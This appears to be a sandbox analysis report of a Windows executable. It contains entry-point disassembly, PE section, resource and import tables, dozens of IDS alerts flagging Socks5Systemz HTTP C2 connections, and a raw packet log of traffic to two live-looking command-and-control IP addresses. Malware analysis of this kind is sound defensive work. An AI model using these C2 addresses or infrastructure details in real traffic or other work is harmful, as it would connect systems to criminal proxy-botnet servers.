                                                                          call 00007FF60CB1275Eh
                                                                          call 00007FF60CB128C5h
                                                                          xor eax, eax
                                                                          push ebp
                                                                          push 0040A2FCh
                                                                          push dword ptr fs:[eax]
                                                                          mov dword ptr fs:[eax], esp
                                                                          xor edx, edx
                                                                          push ebp
                                                                          push 0040A2C5h
                                                                          push dword ptr fs:[edx]
                                                                          mov dword ptr fs:[edx], esp
                                                                          mov eax, dword ptr [0040C014h]
                                                                          call 00007FF60CB1332Bh
                                                                          call 00007FF60CB12F5Eh
                                                                          lea edx, dword ptr [ebp-10h]
                                                                          xor eax, eax
                                                                          call 00007FF60CB10418h
                                                                          mov edx, dword ptr [ebp-10h]
                                                                          mov eax, 0040CE24h
                                                                          call 00007FF60CB0C9C7h
                                                                          push 00000002h
                                                                          push 00000000h
                                                                          push 00000001h
                                                                          mov ecx, dword ptr [0040CE24h]
                                                                          mov dl, 01h
                                                                          mov eax, 0040738Ch
                                                                          call 00007FF60CB10CA7h
                                                                          mov dword ptr [0040CE28h], eax
                                                                          xor edx, edx
                                                                          push ebp
                                                                          push 0040A27Dh
                                                                          push dword ptr fs:[edx]
                                                                          mov dword ptr fs:[edx], esp
                                                                          call 00007FF60CB1339Bh
                                                                          mov dword ptr [0040CE30h], eax
                                                                          mov eax, dword ptr [0040CE30h]
                                                                          cmp dword ptr [eax+0Ch], 01h
                                                                          jne 00007FF60CB134DAh
                                                                          mov eax, dword ptr [0040CE30h]
                                                                          mov edx, 00000028h
                                                                          call 00007FF60CB110A8h
                                                                          mov edx, dword ptr [00000030h]
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          CODE0x10000x93640x94002c410dfc3efd04d9b69c35c70921424eFalse0.6147856841216216data6.560885192755103IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          DATA0xb0000x24c0x400d5ea23d4ecf110fd2591314cbaa84278False0.310546875data2.7390956346874638IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          BSS0xc0000xe880x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                          .reloc0x100000x8b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x110000x2c000x2c004310a3e4becc80a0b43916f165edf318False0.32288707386363635data4.462161325693725IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                          RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                          RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                          RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                          RT_STRING0x125740x2f2data0.35543766578249336
                                                                          RT_STRING0x128680x30cdata0.3871794871794872
                                                                          RT_STRING0x12b740x2cedata0.42618384401114207
                                                                          RT_STRING0x12e440x68data0.75
                                                                          RT_STRING0x12eac0xb4data0.6277777777777778
                                                                          RT_STRING0x12f600xaedata0.5344827586206896
                                                                          RT_RCDATA0x130100x2cdata1.25
                                                                          RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                          RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States0.2764900662251656
                                                                          RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093
                                                                          DLLImport
                                                                          kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                          user32.dllMessageBoxA
                                                                          oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                          kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                          user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                          comctl32.dllInitCommonControls
                                                                          advapi32.dllAdjustTokenPrivileges
                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          DutchNetherlands
                                                                          EnglishUnited States
                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-10-07T13:27:26.512405+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749971185.208.158.24880TCP
                                                                          2024-10-07T13:27:29.382038+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749971185.208.158.24880TCP
                                                                          2024-10-07T13:27:30.195429+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749973185.208.158.24880TCP
                                                                          2024-10-07T13:27:31.003942+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749975185.208.158.24880TCP
                                                                          2024-10-07T13:27:31.352853+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749975185.208.158.24880TCP
                                                                          2024-10-07T13:27:32.179522+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749976185.208.158.24880TCP
                                                                          2024-10-07T13:27:32.990262+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749977185.208.158.24880TCP
                                                                          2024-10-07T13:27:33.834217+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749978185.208.158.24880TCP
                                                                          2024-10-07T13:27:34.649108+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749979185.208.158.24880TCP
                                                                          2024-10-07T13:27:35.606520+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749980185.208.158.24880TCP
                                                                          2024-10-07T13:27:36.432896+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749981185.208.158.24880TCP
                                                                          2024-10-07T13:27:37.246699+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749982185.208.158.24880TCP
                                                                          2024-10-07T13:27:38.070490+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749983185.208.158.24880TCP
                                                                          2024-10-07T13:27:38.989448+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749984185.208.158.24880TCP
                                                                          2024-10-07T13:27:39.342850+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749984185.208.158.24880TCP
                                                                          2024-10-07T13:27:40.180726+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749985185.208.158.24880TCP
                                                                          2024-10-07T13:27:41.175671+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749986185.208.158.24880TCP
                                                                          2024-10-07T13:27:41.991297+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749987185.208.158.24880TCP
                                                                          2024-10-07T13:27:43.154380+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749988185.208.158.24880TCP
                                                                          2024-10-07T13:27:43.981107+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749989185.208.158.24880TCP
                                                                          2024-10-07T13:27:44.876531+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749990185.208.158.24880TCP
                                                                          2024-10-07T13:27:45.233904+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749990185.208.158.24880TCP
                                                                          2024-10-07T13:27:46.186954+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749991185.208.158.24880TCP
                                                                          2024-10-07T13:27:47.010057+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749992185.208.158.24880TCP
                                                                          2024-10-07T13:27:47.911236+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749993185.208.158.24880TCP
                                                                          2024-10-07T13:27:48.260957+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749993185.208.158.24880TCP
                                                                          2024-10-07T13:27:49.064448+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749994185.208.158.24880TCP
                                                                          2024-10-07T13:27:49.418329+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749994185.208.158.24880TCP
                                                                          2024-10-07T13:27:50.225580+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749995185.208.158.24880TCP
                                                                          2024-10-07T13:27:52.041356+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749996185.208.158.24880TCP
                                                                          2024-10-07T13:27:52.859858+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749997185.208.158.24880TCP
                                                                          2024-10-07T13:27:53.216311+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749997185.208.158.24880TCP
                                                                          2024-10-07T13:27:54.039757+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749998185.208.158.24880TCP
                                                                          2024-10-07T13:27:55.039352+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.749999185.208.158.24880TCP
                                                                          2024-10-07T13:27:55.923919+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750000185.208.158.24880TCP
                                                                          2024-10-07T13:27:56.281904+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750000185.208.158.24880TCP
                                                                          2024-10-07T13:27:56.676740+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750000185.208.158.24880TCP
                                                                          2024-10-07T13:27:57.024759+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750000185.208.158.24880TCP
                                                                          2024-10-07T13:27:57.843676+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750001185.208.158.24880TCP
                                                                          2024-10-07T13:27:58.806200+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750002185.208.158.24880TCP
                                                                          2024-10-07T13:27:59.653275+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750003185.208.158.24880TCP
                                                                          2024-10-07T13:28:00.530532+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750004185.208.158.24880TCP
                                                                          2024-10-07T13:28:01.372667+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750005185.208.158.24880TCP
                                                                          2024-10-07T13:28:02.179744+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750006185.208.158.24880TCP
                                                                          2024-10-07T13:28:02.990517+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750007185.208.158.24880TCP
                                                                          2024-10-07T13:28:03.832242+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750008185.208.158.24880TCP
                                                                          2024-10-07T13:28:04.796444+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750009185.208.158.24880TCP
                                                                          2024-10-07T13:28:05.734989+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750010185.208.158.24880TCP
                                                                          2024-10-07T13:28:06.087456+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750010185.208.158.24880TCP
                                                                          2024-10-07T13:28:06.906572+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750011185.208.158.24880TCP
                                                                          2024-10-07T13:28:07.261430+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750011185.208.158.24880TCP
                                                                          2024-10-07T13:28:08.071519+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750012185.208.158.24880TCP
                                                                          2024-10-07T13:28:09.050716+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750013185.208.158.24880TCP
                                                                          2024-10-07T13:28:09.940186+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750014185.208.158.24880TCP
                                                                          2024-10-07T13:28:10.299886+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750014185.208.158.24880TCP
                                                                          2024-10-07T13:28:10.652398+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750014185.208.158.24880TCP
                                                                          2024-10-07T13:28:11.460999+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750015185.208.158.24880TCP
                                                                          2024-10-07T13:28:12.368402+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750016185.208.158.24880TCP
                                                                          2024-10-07T13:28:13.269343+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750017185.208.158.24880TCP
                                                                          2024-10-07T13:28:13.618156+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750017185.208.158.24880TCP
                                                                          2024-10-07T13:28:14.467254+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750018185.208.158.24880TCP
                                                                          2024-10-07T13:28:15.293845+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750019185.208.158.24880TCP
                                                                          2024-10-07T13:28:16.157791+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750020185.208.158.24880TCP
                                                                          2024-10-07T13:28:16.982568+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750021185.208.158.24880TCP
                                                                          2024-10-07T13:28:17.829780+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750022185.208.158.24880TCP
                                                                          2024-10-07T13:28:18.185159+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750022185.208.158.24880TCP
                                                                          2024-10-07T13:28:19.180285+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750023185.208.158.24880TCP
                                                                          2024-10-07T13:28:20.068597+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750024185.208.158.24880TCP
                                                                          2024-10-07T13:28:20.904304+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750025185.208.158.24880TCP
                                                                          2024-10-07T13:28:21.734751+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750026185.208.158.24880TCP
                                                                          2024-10-07T13:28:22.554042+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750027185.208.158.24880TCP
                                                                          2024-10-07T13:28:23.369171+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750028185.208.158.24880TCP
                                                                          2024-10-07T13:28:24.202775+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750029185.208.158.24880TCP
                                                                          2024-10-07T13:28:25.001817+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750030185.208.158.24880TCP
                                                                          2024-10-07T13:28:25.812372+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750031185.208.158.24880TCP
                                                                          2024-10-07T13:28:26.649448+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750032185.208.158.24880TCP
                                                                          2024-10-07T13:28:27.485749+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750033185.208.158.24880TCP
                                                                          2024-10-07T13:28:28.290282+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750034185.208.158.24880TCP
                                                                          2024-10-07T13:28:29.299042+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750035185.208.158.24880TCP
                                                                          2024-10-07T13:28:30.255419+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750036185.208.158.24880TCP
                                                                          2024-10-07T13:28:31.058573+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750037185.208.158.24880TCP
                                                                          2024-10-07T13:28:31.871458+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750038185.208.158.24880TCP
                                                                          2024-10-07T13:28:32.694556+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.750039185.208.158.24880TCP
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Oct 7, 2024 13:27:25.778628111 CEST4997180192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:25.783725977 CEST8049971185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:25.783801079 CEST4997180192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:25.784905910 CEST4997180192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:25.789743900 CEST8049971185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:26.512285948 CEST8049971185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:26.512404919 CEST4997180192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:26.514952898 CEST499722023192.168.2.789.105.201.183
                                                                          Oct 7, 2024 13:27:26.520170927 CEST20234997289.105.201.183192.168.2.7
                                                                          Oct 7, 2024 13:27:26.520303011 CEST499722023192.168.2.789.105.201.183
                                                                          Oct 7, 2024 13:27:26.520358086 CEST499722023192.168.2.789.105.201.183
                                                                          Oct 7, 2024 13:27:26.528836012 CEST20234997289.105.201.183192.168.2.7
                                                                          Oct 7, 2024 13:27:26.528898954 CEST499722023192.168.2.789.105.201.183
                                                                          Oct 7, 2024 13:27:26.534430981 CEST20234997289.105.201.183192.168.2.7
                                                                          Oct 7, 2024 13:27:27.118077993 CEST20234997289.105.201.183192.168.2.7
                                                                          Oct 7, 2024 13:27:27.171973944 CEST499722023192.168.2.789.105.201.183
                                                                          Oct 7, 2024 13:27:29.131093025 CEST4997180192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:29.136158943 CEST8049971185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:29.381908894 CEST8049971185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:29.382038116 CEST4997180192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:29.503130913 CEST4997180192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:29.503468037 CEST4997380192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:29.508366108 CEST8049971185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:29.508467913 CEST4997180192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:29.508490086 CEST8049973185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:29.508670092 CEST4997380192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:29.508670092 CEST4997380192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:29.513715982 CEST8049973185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:30.195314884 CEST8049973185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:30.195429087 CEST4997380192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:30.201970100 CEST499742023192.168.2.789.105.201.183
                                                                          Oct 7, 2024 13:27:30.207544088 CEST20234997489.105.201.183192.168.2.7
                                                                          Oct 7, 2024 13:27:30.207679987 CEST499742023192.168.2.789.105.201.183
                                                                          Oct 7, 2024 13:27:30.207859039 CEST499742023192.168.2.789.105.201.183
                                                                          Oct 7, 2024 13:27:30.207940102 CEST499742023192.168.2.789.105.201.183
                                                                          Oct 7, 2024 13:27:30.212668896 CEST20234997489.105.201.183192.168.2.7
                                                                          Oct 7, 2024 13:27:30.254321098 CEST20234997489.105.201.183192.168.2.7
                                                                          Oct 7, 2024 13:27:30.316693068 CEST4997380192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:30.316977978 CEST4997580192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:30.321949005 CEST8049973185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:30.322137117 CEST8049975185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:30.322170019 CEST4997380192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:30.322268009 CEST4997580192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:30.322818041 CEST4997580192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:30.327616930 CEST8049975185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:30.638895988 CEST20234997489.105.201.183192.168.2.7
                                                                          Oct 7, 2024 13:27:30.639127016 CEST499742023192.168.2.789.105.201.183
                                                                          Oct 7, 2024 13:27:31.003869057 CEST8049975185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:31.003942013 CEST4997580192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:31.112714052 CEST4997580192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:31.118105888 CEST8049975185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:31.352433920 CEST8049975185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:31.352853060 CEST4997580192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:31.471642971 CEST4997580192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:31.472080946 CEST4997680192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:31.477076054 CEST8049975185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:31.477152109 CEST8049976185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:31.477240086 CEST4997680192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:31.477395058 CEST4997580192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:31.477395058 CEST4997680192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:31.482316017 CEST8049976185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:32.179398060 CEST8049976185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:32.179522038 CEST4997680192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:32.300971031 CEST4997680192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:32.301352978 CEST4997780192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:32.306116104 CEST8049976185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:32.306189060 CEST4997680192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:32.306432009 CEST8049977185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:32.306664944 CEST4997780192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:32.308736086 CEST4997780192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:32.313513041 CEST8049977185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:32.989496946 CEST8049977185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:32.990262032 CEST4997780192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:33.113048077 CEST4997780192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:33.113396883 CEST4997880192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:33.118319035 CEST8049977185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:33.118385077 CEST8049978185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:33.118475914 CEST4997780192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:33.118536949 CEST4997880192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:33.118685007 CEST4997880192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:33.123513937 CEST8049978185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:33.834141970 CEST8049978185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:33.834217072 CEST4997880192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:33.957704067 CEST4997880192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:33.957995892 CEST4997980192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:33.962902069 CEST8049978185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:33.962960958 CEST4997880192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:33.963046074 CEST8049979185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:33.963112116 CEST4997980192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:33.974112988 CEST4997980192.168.2.7185.208.158.248
                                                                          Oct 7, 2024 13:27:33.979635000 CEST8049979185.208.158.248192.168.2.7
                                                                          Oct 7, 2024 13:27:34.648974895 CEST8049979185.208.158.248192.168.2.7
